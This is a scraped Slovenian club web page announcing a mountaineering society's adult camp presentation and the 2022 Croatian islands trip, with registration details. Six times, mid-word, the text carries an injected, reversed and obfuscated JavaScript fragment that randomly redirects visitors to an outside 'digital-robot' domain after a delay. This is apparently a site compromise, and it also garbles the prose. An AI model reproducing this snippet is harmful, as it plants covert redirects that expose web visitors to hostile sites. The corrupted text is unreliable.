Planinski večer: Predstavitev tabora za odrasle 2022

Minuli četrtek je Planinsko društvo Šoštanj v Kulturnem domu Šoštanj pripravilo planinski večer na temo planinskih taborov za odrasle. Najprej so si prisotni v 30 minutnem filmčku ogledali reportažo z letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tošnjega tabora, ki je potekal v Albaniji in Grčiji. Video si lahko oglade na spodnji povezavi oziroma na društvenem youtube kanalu.

V drugem delu je sledila predstavitev tabora za naslednje letobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, ki bo potekal po jadranskih otobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tokih Hrvaške. Prenesite si prijavnico ter detajlno predstavitev tabora. Prosim, da se interesenti za tabor v letu 2022 prijavite čimprej pri našemu vodniku Vladu Stropniku. Samo ustna prijava ne zadostuje, potrebno je izpolniti prijavnico ter jo oddati Vladotu osebno ali skenirano preko emaila vlado.stropnik@gmail.com ali info@pd-sostanj.si. Prijave se pobirajo do konca leta 2021 oz. do zasedbe prostih mest (39). Za dodatne informacije se lahko obrnete na vodjo tabora Mateja Kortnika. Tabor bo potekal od 8. do 15. oktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobra 2022. Planinsko društvo se zahvaljuje Občini Šoštanj za najem dvorane Kuluturnega doma Šoštanj.

Fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: Romana Slemenšek

 

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki